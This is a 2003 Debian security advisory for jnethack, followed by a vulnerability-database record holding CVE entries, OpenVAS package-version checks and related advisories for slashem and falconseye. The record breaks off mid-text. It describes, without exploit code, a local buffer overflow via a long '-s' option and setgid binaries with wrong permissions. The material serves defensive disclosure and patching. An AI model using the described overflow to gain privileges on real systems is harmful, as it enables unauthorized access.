[SECURITY] [DSA-316-3] New jnethack packages fix buffer overflow, incorrect permissions
2003-06-17T00:00:00
ID DEBIAN:DSA-316-3:6D849 Type debian Reporter Debian Modified 2003-06-17T00:00:00
Description
Debian Security Advisory DSA 316-3 security@debian.org
http://www.debian.org/security/ Matt Zimmerman
June 17th, 2003 http://www.debian.org/security/faq
Package : jnethack
Vulnerability : buffer overflow, incorrect permissions
Problem-Type : local
Debian-specific: no
CVE Id : CAN-2003-0358 CAN-2003-0359
The jnethack package is vulnerable to a buffer overflow exploited via a
long '-s' command line option. This vulnerability could be used by an
attacker to gain gid 'games' on a system where jnethack is installed.
Additionally, some setgid binaries in the jnethack package have
incorrect permissions, which could allow a user who gains gid 'games'
to replace these binaries, potentially causing other users to execute
malicious code when they run jnethack.
For the stable distribution (woody) these problems have been fixed in
version 1.1.5-11woody2.
For the old stable distribution (potato) these problems have been
fixed in version 1.1.3-4potato1.
For the unstable distribution (sid) these problems are fixed in
version 1.1.5-15.
We recommend that you update your jnethack package.
Upgrade Instructions
wget url
will fetch the file for you
dpkg -i file.deb
will install the referenced file.
If you are using the apt-get package manager, use the line for
sources.list as given below:
apt-get update
will update the internal database
apt-get upgrade
will install corrected packages
You may use an automated update by adding the resources from the
footer to the proper configuration.
These files will probably be moved into the stable distribution on its
next revision.
For apt-get: deb http://security.debian.org/ stable/updates main
For dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main
Mailing list: debian-security-announce@lists.debian.org
Package info: `apt-cache show <pkg>' and http://packages.debian.org/<pkg>
{"id": "DEBIAN:DSA-316-3:6D849", "bulletinFamily": "unix", "title": "[SECURITY] [DSA-316-3] New jnethack packages fix buffer overflow, incorrect permissions", "description": "- --------------------------------------------------------------------------\nDebian Security Advisory DSA 316-3 security@debian.org\nhttp://www.debian.org/security/ Matt Zimmerman\nJune 17th, 2003 http://www.debian.org/security/faq\n- --------------------------------------------------------------------------\n\nPackage : jnethack\nVulnerability : buffer overflow, incorrect permissions\nProblem-Type : local\nDebian-specific: no\nCVE Id : CAN-2003-0358 CAN-2003-0359\n\nThe jnethack package is vulnerable to a buffer overflow exploited via a\nlong '-s' command line option. This vulnerability could be used by an\nattacker to gain gid 'games' on a system where jnethack is installed.\n\nAdditionally, some setgid binaries in the jnethack package have\nincorrect permissions, which could allow a user who gains gid 'games'\nto replace these binaries, potentially causing other users to execute\nmalicious code when they run jnethack.\n\nFor the stable distribution (woody) these problems have been fixed in\nversion 1.1.5-11woody2.\n\nFor the old stable distribution (potato) these problems have been\nfixed in version 1.1.3-4potato1.\n\nFor the unstable distribution (sid) these problems are fixed in\nversion 1.1.5-15.\n\nWe recommend that you update your jnethack package.\n\nUpgrade Instructions\n- --------------------\n\nwget url\n will fetch the file for you\ndpkg -i file.deb\n will install the referenced file.\n\nIf you are using the apt-get package manager, use the line for\nsources.list as given below:\n\napt-get update\n will update the internal database\napt-get upgrade\n will install corrected packages\n\nYou may use an automated update by adding the resources from the\nfooter to the proper configuration.\n\nDebian GNU/Linux 2.2 alias potato\n- ---------------------------------\n\n Source archives:\n\n http://security.debian.org/pool/updates/main/j/jnethack/jnethack_1.1.3-4potato1.dsc\n Size/MD5 checksum: 666 8a7306bcffb423ea5f9986bf904e0ec8\n http://security.debian.org/pool/updates/main/j/jnethack/jnethack_1.1.3-4potato1.diff.gz\n Size/MD5 checksum: 38305 e89b3e56e48c49df7e3b42803c3c27cf\n http://security.debian.org/pool/updates/main/j/jnethack/jnethack_1.1.3.orig.tar.gz\n Size/MD5 checksum: 3502710 d02f410b26031ad82adbae96cd1d4cbf\n\n Alpha architecture:\n\n http://security.debian.org/pool/updates/main/j/jnethack/jnethack_1.1.3-4potato1_alpha.deb\n Size/MD5 checksum: 1949648 f99607e3dd2aa90acc364e81782e5ea5\n\n ARM architecture:\n\n http://security.debian.org/pool/updates/main/j/jnethack/jnethack_1.1.3-4potato1_arm.deb\n Size/MD5 checksum: 1721940 38deb475b51989b02cb26c6331602919\n\n Intel IA-32 architecture:\n\n http://security.debian.org/pool/updates/main/j/jnethack/jnethack_1.1.3-4potato1_i386.deb\n Size/MD5 checksum: 1642800 e3e0d5e9d9c44996ba6125cca7ac565b\n\n Motorola 680x0 architecture:\n\n http://security.debian.org/pool/updates/main/j/jnethack/jnethack_1.1.3-4potato1_m68k.deb\n Size/MD5 checksum: 1596276 91eb29fdf055a4da35ed5c2d0807607e\n\n PowerPC architecture:\n\n http://security.debian.org/pool/updates/main/j/jnethack/jnethack_1.1.3-4potato1_powerpc.deb\n Size/MD5 checksum: 1716416 12299cb33fc58f99944ecf2bd155ac54\n\n Sun Sparc architecture:\n\n http://security.debian.org/pool/updates/main/j/jnethack/jnethack_1.1.3-4potato1_sparc.deb\n Size/MD5 checksum: 1731496 df2ac53286eabe63cd47eaf5f5b209fc\n\nDebian GNU/Linux 3.0 alias woody\n- --------------------------------\n\n Source archives:\n\n http://security.debian.org/pool/updates/main/j/jnethack/jnethack_1.1.5-11woody2.dsc\n Size/MD5 checksum: 661 2332b8bedc5fe69a6b5a305e597866d6\n http://security.debian.org/pool/updates/main/j/jnethack/jnethack_1.1.5-11woody2.diff.gz\n Size/MD5 checksum: 12980 98e0902a5cb001847ad1d9c116f53dac\n http://security.debian.org/pool/updates/main/j/jnethack/jnethack_1.1.5.orig.tar.gz\n Size/MD5 checksum: 3541121 b0f07cf82e2449c17185bd1cf89bb86b\n\n Alpha architecture:\n\n http://security.debian.org/pool/updates/main/j/jnethack/jnethack_1.1.5-11woody2_alpha.deb\n Size/MD5 checksum: 1804310 617338310fd35aec8e63e05f60992fb7\n\n ARM architecture:\n\n http://security.debian.org/pool/updates/main/j/jnethack/jnethack_1.1.5-11woody2_arm.deb\n Size/MD5 checksum: 1657798 3c30134736b9fc5161d4baa5853c262d\n\n Intel IA-32 architecture:\n\n http://security.debian.org/pool/updates/main/j/jnethack/jnethack_1.1.5-11woody2_i386.deb\n Size/MD5 checksum: 1595644 bb20baffb81e35f267ed6af682c6ffd8\n\n Intel IA-64 architecture:\n\n http://security.debian.org/pool/updates/main/j/jnethack/jnethack_1.1.5-11woody2_ia64.deb\n Size/MD5 checksum: 1988626 eff2b9be824303b1524c245d7f3ac6eb\n\n HP Precision architecture:\n\n http://security.debian.org/pool/updates/main/j/jnethack/jnethack_1.1.5-11woody2_hppa.deb\n Size/MD5 checksum: 1694666 25cf60f2e501a1f0ba6a455caee52d0c\n\n Motorola 680x0 architecture:\n\n http://security.debian.org/pool/updates/main/j/jnethack/jnethack_1.1.5-11woody2_m68k.deb\n Size/MD5 checksum: 1555190 b067e550313b59786179d035204ce4e5\n\n Big endian MIPS architecture:\n\n http://security.debian.org/pool/updates/main/j/jnethack/jnethack_1.1.5-11woody2_mips.deb\n Size/MD5 checksum: 1664662 798b9d23eaa9288e00d09976dc0d3f9d\n\n Little endian MIPS architecture:\n\n http://security.debian.org/pool/updates/main/j/jnethack/jnethack_1.1.5-11woody2_mipsel.deb\n Size/MD5 checksum: 1663834 2a7e89a7dead85412917f3d2951a3138\n\n PowerPC architecture:\n\n http://security.debian.org/pool/updates/main/j/jnethack/jnethack_1.1.5-11woody2_powerpc.deb\n Size/MD5 checksum: 1640606 62cc4b8d86662f7c2d6f2abf61d913a2\n\n IBM S/390 architecture:\n\n http://security.debian.org/pool/updates/main/j/jnethack/jnethack_1.1.5-11woody2_s390.deb\n Size/MD5 checksum: 1636892 96ce1695a03565c16c3998de52750081\n\n Sun Sparc architecture:\n\n http://security.debian.org/pool/updates/main/j/jnethack/jnethack_1.1.5-11woody2_sparc.deb\n Size/MD5 checksum: 1652382 22b1e7c9ec2bfe051d1efaa05e7d0cd7\n\nThese files will probably be moved into the stable distribution on its\nnext revision.\n\n- ---------------------------------------------------------------------------------\nFor apt-get: deb http://security.debian.org/ stable/updates main\nFor dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main\nMailing list: debian-security-announce@lists.debian.org\nPackage info: `apt-cache show <pkg>' and http://packages.debian.org/<pkg>\n", "published": "2003-06-17T00:00:00", "modified": "2003-06-17T00:00:00", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}, "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2003/msg00116.html", "reporter": "Debian", "references": [], "cvelist": ["CVE-2003-0359", "CVE-2003-0358"], "type": "debian", "lastseen": "2019-05-30T02:22:31", "edition": 2, "viewCount": 2, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2003-0358", "CVE-2003-0359"]}, {"type": "openvas", "idList": ["OPENVAS:53639", "OPENVAS:53605"]}, {"type": "debian", "idList": ["DEBIAN:DSA-316-1:48A9A", "DEBIAN:DSA-316-2:B22FD", "DEBIAN:DSA-350-1:7D62B"]}, {"type": "nessus", "idList": ["DEBIAN_DSA-316.NASL", "DEBIAN_DSA-350.NASL"]}, {"type": "osvdb", "idList": ["OSVDB:12021", "OSVDB:12020", "OSVDB:12019"]}, {"type": "exploitdb", "idList": ["EDB-ID:22234", "EDB-ID:22233", "EDB-ID:22235"]}], "modified": "2019-05-30T02:22:31", "rev": 2}, "score": {"value": 7.1, "vector": "NONE", "modified": "2019-05-30T02:22:31", "rev": 2}, "vulnersScore": 7.1}, "affectedPackage": [{"OS": "Debian", "OSVersion": "3", "arch": "all", "operator": "lt", "packageFilename": "jnethack_1.1.5-11woody2_all.deb", "packageName": "jnethack", "packageVersion": "1.1.5-11woody2"}, {"OS": "Debian", "OSVersion": "2.2", "arch": "all", "operator": "lt", "packageFilename": "jnethack_1.1.3-4potato1_all.deb", "packageName": "jnethack", "packageVersion": "1.1.3-4potato1"}], "scheme": null}
{"cve": [{"lastseen": "2021-02-02T05:22:09", "description": "nethack 3.4.0 and earlier installs certain setgid binaries with insecure permissions, which allows local users to gain privileges by replacing the original binaries with malicious code.", "edition": 4, "cvss3": {}, "published": "2003-07-24T04:00:00", "title": "CVE-2003-0359", "type": "cve", "cwe": ["NVD-CWE-Other"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": true, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2003-0359"], "modified": "2008-09-05T20:34:00", "cpe": ["cpe:/a:stichting_mathematisch_centrum:nethack:3.4.0"], "id": "CVE-2003-0359", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2003-0359", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:stichting_mathematisch_centrum:nethack:3.4.0:*:*:*:*:*:*:*"]}, {"lastseen": "2021-02-02T05:22:09", "description": "Buffer overflow in (1) nethack 3.4.0 and earlier, and (2) falconseye 1.9.3 and earlier, which is based on nethack, allows local users to gain privileges via a long -s command line option.", "edition": 4, "cvss3": {}, "published": "2003-06-09T04:00:00", "title": "CVE-2003-0358", "type": "cve", "cwe": ["CWE-120"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2003-0358"], "modified": "2020-12-09T15:15:00", "cpe": ["cpe:/o:debian:debian_linux:2.2", "cpe:/a:falconseye_project:falconseye:1.9.3", "cpe:/o:debian:debian_linux:3.0", "cpe:/a:nethack:nethack:3.4.0"], "id": "CVE-2003-0358", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2003-0358", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:falconseye_project:falconseye:1.9.3:*:*:*:*:*:*:*", "cpe:2.3:a:nethack:nethack:3.4.0:*:*:*:*:*:*:*", "cpe:2.3:o:debian:debian_linux:2.2:*:*:*:*:*:*:*", "cpe:2.3:o:debian:debian_linux:3.0:*:*:*:*:*:*:*"]}], "openvas": [{"lastseen": "2017-07-24T12:50:04", "bulletinFamily": "scanner", "cvelist": ["CVE-2003-0359", "CVE-2003-0358"], "description": "The remote host is missing an update to falconseye\nannounced via advisory DSA 350-1.", "modified": "2017-07-07T00:00:00", "published": "2008-01-17T00:00:00", "id": "OPENVAS:53639", "href": "http://plugins.openvas.org/nasl.php?oid=53639", "type": "openvas", "title": "Debian Security Advisory DSA 350-1 (falconseye)", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_350_1.nasl 6616 2017-07-07 12:10:49Z cfischer $\n# Description: Auto-generated from advisory DSA 350-1\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2007 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largerly excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"The falconseye package is vulnerable to a buffer overflow exploited\nvia a long '-s' command line option. This vulnerability could be used\nby an attacker to gain gid 'games' on a system where falconseye is\ninstalled.\n\nNote that falconseye does not contain the file permission error\nCVE-2003-0359 which affected some other nethack packages.\n\nFor the stable distribution (woody) this problem has been fixed in\nversion 1.9.3-7woody3.\n\nFor the unstable distribution (sid) this problem has been fixed in\nversion 1.9.3-9.\n\nWe recommend that you update your falconseye package.\";\ntag_summary = \"The remote host is missing an update to falconseye\nannounced via advisory DSA 350-1.\";\n\ntag_solution = \"https://secure1.securityspace.com/smysecure/catid.html?in=DSA%20350-1\";\n\nif(description)\n{\n script_id(53639);\n script_version(\"$Revision: 6616 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-07 14:10:49 +0200 (Fri, 07 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2008-01-17 22:36:24 +0100 (Thu, 17 Jan 2008)\");\n script_cve_id(\"CVE-2003-0358\", \"CVE-2003-0359\");\n script_tag(name:\"cvss_base\", value:\"4.6\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:P/I:P/A:P\");\n script_name(\"Debian Security Advisory DSA 350-1 (falconseye)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2005 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isdpkgvuln(pkg:\"falconseye-data\", ver:\"1.9.3-7woody3\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"falconseye\", ver:\"1.9.3-7woody3\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 4.6, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-07-24T12:49:52", "bulletinFamily": "scanner", "cvelist": ["CVE-2003-0359", "CVE-2003-0358"], "description": "The remote host is missing an update to nethack\nannounced via advisory DSA 316-1.", "modified": "2017-07-07T00:00:00", "published": "2008-01-17T00:00:00", "id": "OPENVAS:53605", "href": "http://plugins.openvas.org/nasl.php?oid=53605", "type": "openvas", "title": "Debian Security Advisory DSA 316-1 (nethack)", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_316_1.nasl 6616 2017-07-07 12:10:49Z cfischer $\n# Description: Auto-generated from advisory DSA 316-1\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2007 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largerly excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"The nethack package is vulnerable to a buffer overflow exploited via a\nlong '-s' command line option. This vulnerability could be used by an\nattacker to gain gid 'games' on a system where nethack is installed.\n\nAdditionally, some setgid binaries in the nethack package have\nincorrect permissions, which could allow a user who gains gid 'games'\nto replace these binaries, potentially causing other users to execute\nmalicious code when they run nethack.\n\nFor the stable distribution (woody) these problems have been fixed in\nversion 3.4.0-3.0woody3.\n\nFor the old stable distribution (potato) problem xxx has been fixed in\nversion 3.3.0-7potato1.\n\nFor the unstable distribution (sid) these problems are fixed in\nversion 3.4.1-1.\n\nWe recommend that you update your nethack package.\";\ntag_summary = \"The remote host is missing an update to nethack\nannounced via advisory DSA 316-1.\";\n\ntag_solution = \"https://secure1.securityspace.com/smysecure/catid.html?in=DSA%20316-1\";\n\nif(description)\n{\n script_id(53605);\n script_version(\"$Revision: 6616 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-07 14:10:49 +0200 (Fri, 07 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2008-01-17 22:36:24 +0100 (Thu, 17 Jan 2008)\");\n script_cve_id(\"CVE-2003-0358\", \"CVE-2003-0359\");\n script_tag(name:\"cvss_base\", value:\"4.6\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:P/I:P/A:P\");\n script_name(\"Debian Security Advisory DSA 316-1 (nethack)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2005 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isdpkgvuln(pkg:\"nethack\", ver:\"3.3.0-7potato1\", rls:\"DEB2.2\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"nethack\", ver:\"3.4.0-3.0woody3\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"nethack-common\", ver:\"3.4.0-3.0woody3\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"nethack-gnome\", ver:\"3.4.0-3.0woody3\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"nethack-qt\", ver:\"3.4.0-3.0woody3\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"nethack-x11\", ver:\"3.4.0-3.0woody3\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 4.6, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "debian": [{"lastseen": "2019-05-30T02:22:53", "bulletinFamily": "unix", "cvelist": ["CVE-2003-0359", "CVE-2003-0358"], "description": "- --------------------------------------------------------------------------\nDebian Security Advisory DSA 316-2 security@debian.org\nhttp://www.debian.org/security/ Matt Zimmerman\nJune 11th, 2003 http://www.debian.org/security/faq\n- --------------------------------------------------------------------------\n\nPackage : slashem\nVulnerability : buffer overflow\nProblem-Type : local\nDebian-specific: no\nCVE Id : CAN-2003-0358\n\nThe slashem package is vulnerable to a buffer overflow exploited via a\nlong '-s' command line option. This vulnerability could be used by an\nattacker to gain gid 'games' on a system where slashem is installed.\n\nNote that slashem does not contain the file permission problem\nCAN-2003-0359, addressed in nethack in DSA-316-1.\n\nFor the stable distribution (woody) these problems have been fixed in\nversion 0.0.6E4F8-4.0woody3.\n\nFor the old stable distribution (potato) problem xxx has been fixed in\nversion 0.0.5E7-3potato1.\n\nFor the unstable distribution (sid) these problems are fixed in\nversion 0.0.6E4F8-6.\n\nWe recommend that you update your slashem package.\n\nUpgrade Instructions\n- --------------------\n\nwget url\n will fetch the file for you\ndpkg -i file.deb\n will install the referenced file.\n\nIf you are using the apt-get package manager, use the line for\nsources.list as given below:\n\napt-get update\n will update the internal database\napt-get upgrade\n will install corrected packages\n\nYou may use an automated update by adding the resources from the\nfooter to the proper configuration.\n\nDebian GNU/Linux 2.2 alias potato\n- ---------------------------------\n\n Source archives:\n\n http://security.debian.org/pool/updates/main/s/slashem/slashem_0.0.5E7-3potato1.dsc\n Size/MD5 checksum: 646 c1260aec0e4482acf4f92a50a339aeb2\n http://security.debian.org/pool/updates/main/s/slashem/slashem_0.0.5E7-3potato1.diff.gz\n Size/MD5 checksum: 18514 cf58b260c973a4904ca17585364f9479\n http://security.debian.org/pool/updates/main/s/slashem/slashem_0.0.5E7.orig.tar.gz\n Size/MD5 checksum: 3417627 fb572487b96b31af79b53f6d8fc5d0ea\n\n Alpha architecture:\n\n http://security.debian.org/pool/updates/main/s/slashem/slashem_0.0.5E7-3potato1_alpha.deb\n Size/MD5 checksum: 1407622 befbf1f68b7f09e84d13336867e7ef05\n\n ARM architecture:\n\n http://security.debian.org/pool/updates/main/s/slashem/slashem_0.0.5E7-3potato1_arm.deb\n Size/MD5 checksum: 1166174 5f375d78fbee11fb197cc18b2c1b6035\n\n Intel IA-32 architecture:\n\n http://security.debian.org/pool/updates/main/s/slashem/slashem_0.0.5E7-3potato1_i386.deb\n Size/MD5 checksum: 1069950 b631b6f9ff0b11eeb6b2d3c337dc42b6\n\n Motorola 680x0 architecture:\n\n http://security.debian.org/pool/updates/main/s/slashem/slashem_0.0.5E7-3potato1_m68k.deb\n Size/MD5 checksum: 1021770 1b7197100e7c59e108b02d4f9fd2c832\n\n PowerPC architecture:\n\n http://security.debian.org/pool/updates/main/s/slashem/slashem_0.0.5E7-3potato1_powerpc.deb\n Size/MD5 checksum: 1151790 1cfe94de576794a4f4ae31a51f2cb48d\n\n Sun Sparc architecture:\n\n http://security.debian.org/pool/updates/main/s/slashem/slashem_0.0.5E7-3potato1_sparc.deb\n Size/MD5 checksum: 1172080 0f42ad8b59d725dc637d36cc792f1cfd\n\nDebian GNU/Linux 3.0 alias woody\n- --------------------------------\n\n Source archives:\n\n http://security.debian.org/pool/updates/main/s/slashem/slashem_0.0.6E4F8-4.0woody3.dsc\n Size/MD5 checksum: 671 6e0378a87cfb1eb63b584da9f7ebee00\n http://security.debian.org/pool/updates/main/s/slashem/slashem_0.0.6E4F8-4.0woody3.diff.gz\n Size/MD5 checksum: 13165 2f698a1a083465bbfd1f875f9875ecdc\n http://security.debian.org/pool/updates/main/s/slashem/slashem_0.0.6E4F8.orig.tar.gz\n Size/MD5 checksum: 4331015 2abd847d4f5fc426d6c7ed5a97b0de99\n\n Alpha architecture:\n\n http://security.debian.org/pool/updates/main/s/slashem/slashem_0.0.6E4F8-4.0woody3_alpha.deb\n Size/MD5 checksum: 1868864 9e59db9dffbc4fdb3973775236b56b2d\n\n ARM architecture:\n\n http://security.debian.org/pool/updates/main/s/slashem/slashem_0.0.6E4F8-4.0woody3_arm.deb\n Size/MD5 checksum: 1576768 9bd2470960f06c7b404e10fbdc70f7e3\n\n Intel IA-32 architecture:\n\n http://security.debian.org/pool/updates/main/s/slashem/slashem_0.0.6E4F8-4.0woody3_i386.deb\n Size/MD5 checksum: 1465086 bf5fda3a71bf45ea444006a45d43ee5d\n\n Intel IA-64 architecture:\n\n http://security.debian.org/pool/updates/main/s/slashem/slashem_0.0.6E4F8-4.0woody3_ia64.deb\n Size/MD5 checksum: 2125556 8c1e66316b4b03ec74389b1da3fe2cc8\n\n HP Precision architecture:\n\n http://security.debian.org/pool/updates/main/s/slashem/slashem_0.0.6E4F8-4.0woody3_hppa.deb\n Size/MD5 checksum: 1714032 6944f94947bce488e1331cf3acdcf738\n\n Motorola 680x0 architecture:\n\n http://security.debian.org/pool/updates/main/s/slashem/slashem_0.0.6E4F8-4.0woody3_m68k.deb\n Size/MD5 checksum: 1411706 9caae66305fdb6e82afaf93442ea96af\n\n Big endian MIPS architecture:\n\n http://security.debian.org/pool/updates/main/s/slashem/slashem_0.0.6E4F8-4.0woody3_mips.deb\n Size/MD5 checksum: 1628620 cc0c4fedd449ce5f80349ea3ad816ec8\n\n Little endian MIPS architecture:\n\n http://security.debian.org/pool/updates/main/s/slashem/slashem_0.0.6E4F8-4.0woody3_mipsel.deb\n Size/MD5 checksum: 1632522 e6b46c75fa17fe82c0791868371a6db6\n\n PowerPC architecture:\n\n http://security.debian.org/pool/updates/main/s/slashem/slashem_0.0.6E4F8-4.0woody3_powerpc.deb\n Size/MD5 checksum: 1574996 9085a3b1e5708599f8ec9e62693977d8\n\n IBM S/390 architecture:\n\n http://security.debian.org/pool/updates/main/s/slashem/slashem_0.0.6E4F8-4.0woody3_s390.deb\n Size/MD5 checksum: 1549104 829ed8bd7743d2eeae4e17392faad905\n\n Sun Sparc architecture:\n\n http://security.debian.org/pool/updates/main/s/slashem/slashem_0.0.6E4F8-4.0woody3_sparc.deb\n Size/MD5 checksum: 1596788 f6474b287da991a0426c83710862c249\n\nThese files will probably be moved into the stable distribution on its\nnext revision.\n\n- ---------------------------------------------------------------------------------\nFor apt-get: deb http://security.debian.org/ stable/updates main\nFor dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main\nMailing list: debian-security-announce@lists.debian.org\nPackage info: `apt-cache show <pkg>' and http://packages.debian.org/<pkg>\n", "edition": 2, "modified": "2003-06-11T00:00:00", "published": "2003-06-11T00:00:00", "id": "DEBIAN:DSA-316-2:B22FD", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2003/msg00108.html", "title": "[SECURITY] [DSA-316-2] New slashem packages fix buffer overflow", "type": "debian", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-11-11T13:16:01", "bulletinFamily": "unix", "cvelist": ["CVE-2003-0359", "CVE-2003-0358"], "description": "- --------------------------------------------------------------------------\nDebian Security Advisory DSA 350-1 security@debian.org\nhttp://www.debian.org/security/ Matt Zimmerman\nJuly 15th, 2003 http://www.debian.org/security/faq\n- --------------------------------------------------------------------------\n\nPackage : falconseye\nVulnerability : buffer overflow\nProblem-Type : local\nDebian-specific: no\nCVE Id : CAN-2003-0358\n\nThe falconseye package is vulnerable to a buffer overflow exploited\nvia a long '-s' command line option. This vulnerability could be used\nby an attacker to gain gid 'games' on a system where falconseye is\ninstalled.\n\nNote that falconseye does not contain the file permission error\nCAN-2003-0359 which affected some other nethack packages.\n\nFor the stable distribution (woody) this problem has been fixed in\nversion 1.9.3-7woody3.\n\nFor the unstable distribution (sid) this problem has been fixed in\nversion 1.9.3-9.\n\nWe recommend that you update your falconseye package.\n\nUpgrade Instructions\n- --------------------\n\nwget url\n will fetch the file for you\ndpkg -i file.deb\n will install the referenced file.\n\nIf you are using the apt-get package manager, use the line for\nsources.list as given below:\n\napt-get update\n will update the internal database\napt-get upgrade\n will install corrected packages\n\nDebian GNU/Linux 3.0 alias woody\n- --------------------------------\n\n Source archives:\n\n http://security.debian.org/pool/updates/main/f/falconseye/falconseye_1.9.3-7woody3.dsc\n Size/MD5 checksum: 700 b11f92392768f7513c5d4f113faf113d\n http://security.debian.org/pool/updates/main/f/falconseye/falconseye_1.9.3-7woody3.diff.gz\n Size/MD5 checksum: 14939 70aeba2469a22234e1d6c659c47e848a\n http://security.debian.org/pool/updates/main/f/falconseye/falconseye_1.9.3.orig.tar.gz\n Size/MD5 checksum: 8237462 